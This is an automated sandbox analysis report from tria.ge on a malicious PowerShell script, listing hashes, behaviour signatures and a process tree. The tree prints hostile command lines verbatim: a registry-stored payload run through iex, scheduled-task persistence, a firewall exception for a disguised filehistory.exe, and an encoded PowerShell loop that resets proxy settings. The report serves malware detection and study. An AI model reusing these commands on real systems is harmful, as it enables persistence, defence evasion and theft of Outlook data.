Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    128s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20221111-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
  • submitted
    30/01/2023, 19:09

General

  • Target

    8d26bbd255959e85469d98052b2b9719056b921b.ps1

  • Size

    1.3MB

  • MD5

    0e57f8b84f45a1d8fd338efdf7bb6efd

  • SHA1

    8d26bbd255959e85469d98052b2b9719056b921b

  • SHA256

    da5d6b505c8db97706685d7586b2cdd7331adedce4208e497983f589bb2da5e8

  • SHA512

    8d7f7fa1c7daf75391af531b7c5036d19160a7d2585834aa11c537edfad5af750f044704e821c283dcdec768bd2f96dc3028bbe1bcbe777cd66c4fe80d9abce0

  • SSDEEP

    24576:KEsXbB3Mec6NwkOvKpnFpL1/pwygb57Itbrp7QU4qXdcDXhKi0iZ:QFMecFkOSpFayg4bEvrhTh

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Modifies Windows Firewall 1 TTPs 2 IoCs
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 1 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Kills process with taskkill 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 47 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 32 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\8d26bbd255959e85469d98052b2b9719056b921b.ps1
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4704
    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\vb0rug1s\vb0rug1s.cmdline"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:452
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6C3C.tmp" "c:\Users\Admin\AppData\Local\Temp\vb0rug1s\CSC20D45A6B53904B428CF773F7AEDCAFD6.TMP"
        3⤵
          PID:4648
      • C:\Windows\system32\taskkill.exe
        "C:\Windows\system32\taskkill.exe" /im FileHistory.exe /f
        2⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1344
      • C:\Windows\system32\schtasks.exe
        "C:\Windows\system32\schtasks.exe" /delete /tn MicrosoftSystemMetrics_2382 /f
        2⤵
          PID:5020
        • C:\Windows\system32\schtasks.exe
          "C:\Windows\system32\schtasks.exe" /create /XML C:\Users\Admin\AppData\Local\Temp\browser.xml /tn MicrosoftSystemMetrics_2382
          2⤵
          • Creates scheduled task(s)
          PID:3484
        • C:\Windows\system32\schtasks.exe
          "C:\Windows\system32\schtasks.exe" /run /tn MicrosoftSystemMetrics_2382
          2⤵
            PID:1048
        • C:\Windows\system32\conhost.EXE
          C:\Windows\system32\conhost.EXE --headless powershell -c " cd 'C:\Users\Admin\AppData\Roaming\S0DJc5Rk'; [System.Text.Encoding]::ascii.GetString((Get-ItemProperty -Path HKLM:\Software\Adobe -Name Licensefile).licensefile)|iex"
          1⤵
          • Suspicious use of WriteProcessMemory
          PID:1388
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -c " cd 'C:\Users\Admin\AppData\Roaming\S0DJc5Rk'; [System.Text.Encoding]::ascii.GetString((Get-ItemProperty -Path HKLM:\Software\Adobe -Name Licensefile).licensefile)|iex"
            2⤵
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:1460
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\0hau4mwy\0hau4mwy.cmdline"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:4876
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA02D.tmp" "c:\Users\Admin\AppData\Local\Temp\0hau4mwy\CSC525E82F6A21045678DC68ECA73E89117.TMP"
                4⤵
                  PID:4616
              • \??\c:\windows\system32\filehistory.exe
                c:\windows\system32\filehistory.exe
                3⤵
                • Accesses Microsoft Outlook profiles
                • Checks processor information in registry
                • Suspicious behavior: AddClipboardFormatListener
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of WriteProcessMemory
                • outlook_office_path
                • outlook_win_path
                PID:4964
                • \??\c:\windows\system32\netsh.exe
                  "netsh.exe" firewall add allowedprogram c:\windows\system32\filehistory.exe SystemUpdate ENABLE
                  4⤵
                  • Modifies Windows Firewall
                  PID:3176
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "powershell.exe" -enc dwBoAGkAbABlACgAJAB0AHIAdQBlACkAewAKAHQAcgB5AHsAaQB3AHIAIAAnAGgAdAB0AHAAcwA6AC8ALwBlAHgAYQBtAHAAbABlAC4AYwBvAG0AJwAgAC0AdQBzAGUAYgBhAHMAaQBjAHAAYQByAHMAaQBuAGcAfQBjAGEAdABjAGgAewAKACQAcgBlAGcASwBlAHkAPQAiAEgASwBDAFUAOgBcAFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAEkAbgB0AGUAcgBuAGUAdAAgAFMAZQB0AHQAaQBuAGcAcwAiADsAUwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AcABhAHQAaAAgACQAcgBlAGcASwBlAHkAIABQAHIAbwB4AHkARQBuAGEAYgBsAGUAIAAtAHYAYQBsAHUAZQAgADAAIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAdABvAHAAIAA7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAHAAYQB0AGgAIAAkAHIAZQBnAEsAZQB5ACAAUAByAG8AeAB5AFMAZQByAHYAZQByACAALQB2AGEAbAB1AGUAIAAiACIAIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAdABvAHAAOwAgAFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAHAAYQB0AGgAIAAkAHIAZQBnAEsAZQB5ACAAQQB1AHQAbwBDAG8AbgBmAGkAZwBVAFIATAAgAC0AVgBhAGwAdQBlACAAIgAiACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAHQAbwBwADsAZQB4AGkAdAAKAH0ACgBzAGwAZQBlAHAAIAAyAH0A
                  4⤵
                  • Blocklisted process makes network request
                  • Suspicious behavior: EnumeratesProcesses
                  PID:4112
                • \??\c:\windows\system32\netsh.exe
                  "netsh.exe" firewall add allowedprogram c:\windows\system32\filehistory.exe SystemUpdate ENABLE
                  4⤵
                  • Modifies Windows Firewall
                  PID:4412
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "powershell.exe" -enc dwBoAGkAbABlACgAJAB0AHIAdQBlACkAewAKAHQAcgB5AHsAaQB3AHIAIAAnAGgAdAB0AHAAcwA6AC8ALwBlAHgAYQBtAHAAbABlAC4AYwBvAG0AJwAgAC0AdQBzAGUAYgBhAHMAaQBjAHAAYQByAHMAaQBuAGcAfQBjAGEAdABjAGgAewAKACQAcgBlAGcASwBlAHkAPQAiAEgASwBDAFUAOgBcAFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAEkAbgB0AGUAcgBuAGUAdAAgAFMAZQB0AHQAaQBuAGcAcwAiADsAUwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AcABhAHQAaAAgACQAcgBlAGcASwBlAHkAIABQAHIAbwB4AHkARQBuAGEAYgBsAGUAIAAtAHYAYQBsAHUAZQAgADAAIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAdABvAHAAIAA7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAHAAYQB0AGgAIAAkAHIAZQBnAEsAZQB5ACAAUAByAG8AeAB5AFMAZQByAHYAZQByACAALQB2AGEAbAB1AGUAIAAiACIAIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAdABvAHAAOwAgAFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAHAAYQB0AGgAIAAkAHIAZQBnAEsAZQB5ACAAQQB1AHQAbwBDAG8AbgBmAGkAZwBVAFIATAAgAC0AVgBhAGwAdQBlACAAIgAiACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAHQAbwBwADsAZQB4AGkAdAAKAH0ACgBzAGwAZQBlAHAAIAAyAH0A
                  4⤵
                  • Blocklisted process makes network request
                  • Suspicious behavior: EnumeratesProcesses
                  PID:3892

          Network

          MITRE ATT&CK Enterprise v6

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

            Filesize

            3KB

            MD5

            c210b6276a1afb2b92059401e9540b25

            SHA1

            5e24715fbf2993cd63c3c05cae3dd7d3eb209310

            SHA256

            d380d3cba9d99c7a56454c4c42504c7ec6807151bff6ed03390628fa7e4f4ac3

            SHA512

            07333d3a8400137618ee894e7743656dbb05fd84fd99a2178d62060dd9b8b256f62d606d10978d221cb887a5c2d16902c6ff0519d53c7f542b9e3e6d08eaad7d

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            1KB

            MD5

            9409534a4d4d450f8a7f3c19c906c794

            SHA1

            5a67553335af6bef2ddd21b84863ab1d18700986

            SHA256

            33604779c966ac9170034debad13c30e742fa94b1654354bc10b5f6d60660c94

            SHA512

            570a6d91143dd986c9461c632ebb401b8713b4963b92086d1a67ef1fcc97f8bf06a5b9e56603de9d626f3a086c538f165e00488bf9584c853c0554e765dc2ba4

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            1KB

            MD5

            e85026c4f44de16a9d26e7756051f74f

            SHA1

            d366152c963a207ca8ff5f1adcfdeef5c9522b2b

            SHA256

            5cb4a5bc609602087cf0f7d5a902e7c3925ccd173b60170c77f15a8f8524a47e

            SHA512

            e7025c376fd0010aae9a7ccfa08670cb0361da088a42932d0b9c0f0c7f8ca99e567e694af47df7025c03abc16f5c8ec33c2e690058c525aa5e0cf8d94d615e65

          • C:\Users\Admin\AppData\Local\Temp\0hau4mwy\0hau4mwy.dll

            Filesize

            3KB

            MD5

            939716ed0e75b8be90c0368fe847597b

            SHA1

            a7c325c70cbc94a79d394682859375162ca91b35

            SHA256

            1d73f35e0139955fdd3bf93307a7f902ef6c554b143730cecfee5875b93a8c8d

            SHA512

            1e53c33ba81dc553cb80a047296d09ddcea646a3e55ba5f8a1e0f4d8699618c11f843fd0a8b29d0124208fed1bedeb9230c84923b08b191626f4dd010ccb9245

          • C:\Users\Admin\AppData\Local\Temp\RES6C3C.tmp

            Filesize

            1KB

            MD5

            82fb51a95fcf6f1f47e41b77c56c4de5

            SHA1

            c73741ee257e01df893e458ff940e1c75bc8e53d

            SHA256

            50f6469704d01cf5f7e66014f67922284806fef186e02b38daf8fd67acdc65b5

            SHA512

            bd20ab07b498cd03ab838a0613564e05c1b042679c98c0b002cff63e33ffdd93df89bcf4ee9170e0f0395b8334622158d37f25a87796cb58bf07d9044222566c

          • C:\Users\Admin\AppData\Local\Temp\RESA02D.tmp

            Filesize

            1KB

            MD5

            f6cbd1bd44807b24b39b8f8e20dcfa86

            SHA1

            f1864b02d834e1dc1748ff9bd2ddf3c08ec41e4c

            SHA256

            b87b65499394146bc7b0ce5673183bac388545c466c581ea3cd94929d86e35c8

            SHA512

            cec137a2d86f2a1ec687345e3fbb9c1f5b2d960fdfb0b8173829dc79f663e0155e0a16c87a83ad4803c2b1c50c9b7156409fad7a9ede53d940a805d375874ef4

          • C:\Users\Admin\AppData\Local\Temp\browser.xml

            Filesize

            3KB

            MD5

            c36c29824cc56e4545983941a2d81ae6

            SHA1

            fe9a2b5328c32661af48c3689ddfc8df273032dd

            SHA256

            ef5189730d729db6f7cb359728ed844e7fc49673d0a15a2f57c32f263378418a

            SHA512

            bc6cf34342bdbddea112b99a393e387b1e60093f63aa56f337cde1aa3958e78ab32b8824062c1df6028b49b102febfcb71dea88672cc0cdce8cb11ce6b5c6120

          • C:\Users\Admin\AppData\Local\Temp\vb0rug1s\vb0rug1s.dll

            Filesize

            3KB

            MD5

            669618897a2dd921e23a5fa27371d832

            SHA1

            8af39ea6d93fa8c55f8426d52f696ef546509aac

            SHA256

            a80f8aa51a241ef34dfc184ef0e6f332e3a801a9e932cdcd73394be793d73a69

            SHA512

            b75ae7532387803966866281650e18a3d7c04eaaae5c6d79da1a250e7623694220c3220ab547d99688af00f54ad6062b876d1fa8cfea21ccbb5706d07c2bd50e

          • C:\Users\Admin\AppData\Roaming\S0DJc5Rk\EULA.txt

            Filesize

            503KB

            MD5

            08dd4037a97cc6b074dbace9764b374d

            SHA1

            dd11c839c367e3e0ca439bbac0488c04804d8a89

            SHA256

            007fcfd18d2d8be1661e10ae0c5e998c1218929e507cd3017fee1f4d84c36fc8

            SHA512

            e5d5b508725a3ff51073c5325a8f1f17020e93a72ffb0cfff3c1472de8e0d918d100a0220719386f86367106236be010a542126054b47a3017d5b5b4b08493d8

          • \??\c:\Users\Admin\AppData\Local\Temp\0hau4mwy\0hau4mwy.0.cs

            Filesize

            526B

            MD5

            c7a6a3392a4717e43c98b58c5d9499ec

            SHA1

            b2d0f46eb45783fc73fb97f3fa18b1023e0c4792

            SHA256

            3c3a6f9826e3176d6367f20530a4d10a7807b1cc90e142278b949fcfaba05fe5

            SHA512

            5bbb4adc4b3ece5215d94c49ace16c1274cadc67b136ff81a7ad88e070ed302e91de25519b8ecf52ba8951e6e0aca5932ef942e35806802105f9312a56aa5e26

          • \??\c:\Users\Admin\AppData\Local\Temp\0hau4mwy\0hau4mwy.cmdline

            Filesize

            369B

            MD5

            aad6a795042e3dd0bc572b61ff9fac15

            SHA1

            b7b4b0ca0d0a76b8da75636773d0286fc630405f

            SHA256

            dd2f6b9ca4e0dd1f1cebe3fb5dd3bfd0b34e5b4cd39ef541f5511c53a1bb76c4

            SHA512

            5d2f13fb76cf6c62c4667de270ff9c5e111192a5b9d06f6888c82b7f46d2256caee87f619e1e3aed45532e90a889a6a8dc18eca9a3f233082c8ecbb9901685f7

          • \??\c:\Users\Admin\AppData\Local\Temp\0hau4mwy\CSC525E82F6A21045678DC68ECA73E89117.TMP

            Filesize

            652B

            MD5

            746e20648fc9d7d60c3c6a519ff0949d

            SHA1

            aa22eb6b9854387085baeb8acd803f92ce69eeef

            SHA256

            d2ef6c3489901b2c15ea1c6ecbb65c09f7fe517c149f5ccb52c43c584d7f700e

            SHA512

            c37fb18973b9d2a17db48822ba34552b438d72d850d4bd87cbcada3add8de0df2b18d5c1967f2cb6960cc606059199f898f98d7e21c7c1e2dc1a7382fc53b80e

          • \??\c:\Users\Admin\AppData\Local\Temp\vb0rug1s\CSC20D45A6B53904B428CF773F7AEDCAFD6.TMP

            Filesize

            652B

            MD5

            8bcd9dad8b17f744b8d4d01835c19764

            SHA1

            4b8005c83e8b4e3b05c138fca02e02de434d415d

            SHA256

            a7671540cc7df4787f3766e59ba4ad1c80f85bc26a0a9fe34ee43efd1a3421f0

            SHA512

            86c37f48793d09eac35b3e9fe3a0e845a4df99350b474657d8d52e2c784394338e913f972cff3687f4da971f25973193d690f469428be10c6e980aa9492a247f

          • \??\c:\Users\Admin\AppData\Local\Temp\vb0rug1s\vb0rug1s.0.cs

            Filesize

            526B

            MD5

            c7a6a3392a4717e43c98b58c5d9499ec

            SHA1

            b2d0f46eb45783fc73fb97f3fa18b1023e0c4792

            SHA256

            3c3a6f9826e3176d6367f20530a4d10a7807b1cc90e142278b949fcfaba05fe5

            SHA512

            5bbb4adc4b3ece5215d94c49ace16c1274cadc67b136ff81a7ad88e070ed302e91de25519b8ecf52ba8951e6e0aca5932ef942e35806802105f9312a56aa5e26

          • \??\c:\Users\Admin\AppData\Local\Temp\vb0rug1s\vb0rug1s.cmdline

            Filesize

            369B

            MD5

            98617335a4698f23915b5ef365b684ab

            SHA1

            d8dff00c44766f5f333b40efd1468743f0c32108

            SHA256

            3d7a1bb56c73bc33fd41a317c3c16cc2e200f7b7991552288c250ccacf7bc3fd

            SHA512

            e4957cc2dc52514a4df46cffe77925119752b78f6d2a470ec4a3ebff7761d9871f4e8869b6ae434da009d520b3c2ea4a8e6fd628bab0f86bd123e2e17846ca61

          • memory/1460-165-0x00007FFA96AE0000-0x00007FFA975A1000-memory.dmp

            Filesize

            10.8MB

          • memory/1460-152-0x00007FFA96AE0000-0x00007FFA975A1000-memory.dmp

            Filesize

            10.8MB

          • memory/3892-180-0x00007FFA96AE0000-0x00007FFA975A1000-memory.dmp

            Filesize

            10.8MB

          • memory/3892-181-0x00007FFA96AE0000-0x00007FFA975A1000-memory.dmp

            Filesize

            10.8MB

          • memory/4112-176-0x00007FFA96AE0000-0x00007FFA975A1000-memory.dmp

            Filesize

            10.8MB

          • memory/4112-177-0x00007FFA96AE0000-0x00007FFA975A1000-memory.dmp

            Filesize

            10.8MB

          • memory/4704-144-0x00000291F77C0000-0x00000291F7810000-memory.dmp

            Filesize

            320KB

          • memory/4704-133-0x00007FFA96AE0000-0x00007FFA975A1000-memory.dmp

            Filesize

            10.8MB

          • memory/4704-134-0x00000291F7790000-0x00000291F77BA000-memory.dmp

            Filesize

            168KB

          • memory/4704-135-0x00000291F7790000-0x00000291F77B4000-memory.dmp

            Filesize

            144KB

          • memory/4704-132-0x00000291F72C0000-0x00000291F72E2000-memory.dmp

            Filesize

            136KB

          • memory/4704-148-0x00007FFA96AE0000-0x00007FFA975A1000-memory.dmp

            Filesize

            10.8MB

          • memory/4704-151-0x00007FFA96AE0000-0x00007FFA975A1000-memory.dmp

            Filesize

            10.8MB

          • memory/4964-162-0x0000000140000000-0x0000000140072000-memory.dmp

            Filesize

            456KB

          • memory/4964-172-0x000002642DC10000-0x000002642DC2E000-memory.dmp

            Filesize

            120KB

          • memory/4964-171-0x00000264304A0000-0x0000026430516000-memory.dmp

            Filesize

            472KB

          • memory/4964-170-0x000002642DBA0000-0x000002642DBEA000-memory.dmp

            Filesize

            296KB

          • memory/4964-168-0x00000264157A0000-0x00000264157B5000-memory.dmp

            Filesize

            84KB

          • memory/4964-169-0x00000264158D0000-0x00000264158F1000-memory.dmp

            Filesize

            132KB

          • memory/4964-167-0x00007FFA96AE0000-0x00007FFA975A1000-memory.dmp

            Filesize

            10.8MB

          • memory/4964-166-0x00007FFA96AE0000-0x00007FFA975A1000-memory.dmp

            Filesize

            10.8MB